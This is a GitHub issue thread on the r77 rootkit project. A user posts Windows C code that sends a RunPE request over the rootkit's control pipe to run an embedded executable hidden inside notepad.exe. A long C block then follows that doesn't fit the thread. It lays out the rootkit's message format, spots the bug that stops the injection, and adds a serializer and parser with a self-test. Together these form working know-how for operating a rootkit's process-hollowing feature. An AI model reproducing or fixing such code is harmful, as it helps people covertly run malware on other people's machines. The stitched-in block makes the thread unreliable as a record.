bytecode77 / r77-rootkit

Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.
https://bytecode77.com/r77-rootkit
BSD 2-Clause "Simplified" License
1.55k stars 383 forks

how to run a pe using control pipe? #36

Closed ghost closed 1 year ago

ghost commented 1 year ago

I've tried this using the examples provided. The PE is in resources.

    #include <Windows.h>
    // CONTROL_USER_RUNPE and GetResource() come from r77's API headers (r77def.h / r77api.h)

    // Connect to the r77 control pipe
    HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (pipe != INVALID_HANDLE_VALUE)
    {
        // Load the embedded executable from the resource section
        LPBYTE pe;
        DWORD peSize;
        if (!GetResource(IDR_R72, "EXE", &pe, &peSize)) return 0;

        DWORD controlCode = CONTROL_USER_RUNPE;
        WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe";

        // Write control code (DWORD)
        DWORD bytesWritten;
        WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL);

        // Write the target path (unicode string including null terminator)
        WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * 2, &bytesWritten, NULL);

        // Write the size of the executable (DWORD); WriteFile takes a pointer to the buffer, so pass &peSize, not peSize
        WriteFile(pipe, &peSize, sizeof(DWORD), &bytesWritten, NULL);

        // Write the executable bytes
        WriteFile(pipe, pe, peSize, &bytesWritten, NULL);

        CloseHandle(pipe);
    }

But the PE does not execute.
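The message written to the control pipe above has a fixed byte layout (control code, null-terminated UTF-16 path, size, then the executable bytes), and the snippet's third WriteFile passes the size value where a pointer to it is expected, so the rootkit reads garbage as the size field. The following is an added example, not r77's own code, that builds and parses that layout in portable C so the framing can be checked offline; it assumes ASCII-only paths, takes the numeric control code as a parameter (the real value is defined in r77def.h; `0x3002` below is only a placeholder for the self-test), and uses a constructed MZ stub rather than a real PE.

```c
/*
 * Added example: wire layout of a CONTROL_USER_RUNPE request as implied by the
 * snippet above. Layout: [u32 control code][UTF-16LE path + 0x0000][u32 pe_size][pe bytes]
 * Not r77's code; control code values and a real PE are NOT assumed here.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef struct {
    uint32_t control_code;
    char target_path[260];   /* decoded back to ASCII; ASCII-only paths assumed */
    const uint8_t *pe;       /* points into the parsed buffer */
    uint32_t pe_size;
} runpe_msg;

static size_t put_u32(uint8_t *buf, size_t off, uint32_t v)
{
    buf[off] = (uint8_t)v;             buf[off + 1] = (uint8_t)(v >> 8);
    buf[off + 2] = (uint8_t)(v >> 16); buf[off + 3] = (uint8_t)(v >> 24);
    return off + 4;
}

static uint32_t get_u32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Serialize one request. Returns total length, or 0 if the buffer is too small. */
size_t build_runpe_message(uint8_t *out, size_t cap, uint32_t control_code,
                           const char *target_path, const uint8_t *pe, uint32_t pe_size)
{
    size_t path_len = strlen(target_path) + 1;          /* include the terminator */
    size_t need = 4 + 2 * path_len + 4 + pe_size;
    size_t off, i;
    if (need > cap) return 0;
    off = put_u32(out, 0, control_code);
    for (i = 0; i < path_len; i++) {                    /* ASCII -> UTF-16LE */
        out[off++] = (uint8_t)target_path[i];
        out[off++] = 0;
    }
    off = put_u32(out, off, pe_size);  /* the VALUE of the size goes on the wire; the
                                          snippet passed that value where WriteFile wants a pointer */
    memcpy(out + off, pe, pe_size);
    return off + pe_size;
}

/* Parse one request. Returns 1 on success, 0 if truncated, the path is unterminated
 * or too long, or the size field does not match the remaining bytes. */
int parse_runpe_message(const uint8_t *buf, size_t len, runpe_msg *out)
{
    size_t off = 0, n = 0;
    if (len < 4) return 0;
    out->control_code = get_u32(buf);
    off = 4;
    for (;;) {
        uint16_t ch;
        if (off + 2 > len || n >= sizeof out->target_path) return 0;
        ch = (uint16_t)(buf[off] | buf[off + 1] << 8);
        off += 2;
        if (ch == 0) { out->target_path[n] = 0; break; }
        if (ch > 0x7f) return 0;                        /* non-ASCII not handled here */
        out->target_path[n++] = (char)ch;
    }
    if (off + 4 > len) return 0;
    out->pe_size = get_u32(buf + off);
    off += 4;
    if (len - off != out->pe_size) return 0;            /* trailing bytes must be exactly pe_size */
    out->pe = buf + off;
    return 1;
}

/* Round-trip a constructed MZ stub (not a real executable). Returns 1 if all checks pass. */
int runpe_selftest(void)
{
    static const uint8_t fake_pe[6] = { 'M', 'Z', 0x90, 0x00, 0x03, 0x00 };  /* constructed sample */
    const char *path = "C:\\Windows\\System32\\notepad.exe";
    uint8_t wire[256];
    runpe_msg m;
    size_t n = build_runpe_message(wire, sizeof wire, 0x3002u /* placeholder code */, path, fake_pe, sizeof fake_pe);
    if (n == 0 || !parse_runpe_message(wire, n, &m)) return 0;
    if (m.pe_size != sizeof fake_pe || memcmp(m.pe, fake_pe, sizeof fake_pe) != 0) return 0;
    if (strcmp(m.target_path, path) != 0) return 0;
    /* a message whose size field disagrees with the payload must be rejected */
    return parse_runpe_message(wire, n - 1, &m) == 0;
}

int main(void)
{
    printf("round trip %s\n", runpe_selftest() ? "ok" : "FAILED");
    return 0;
}
```

The parser rejects a message whose size field and trailing byte count disagree, which is exactly what happens when the size is written wrongly: the receiver reads a bogus length and never gets a consistent executable to run.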

ghost commented 1 year ago

nvm, found the error. Thanks.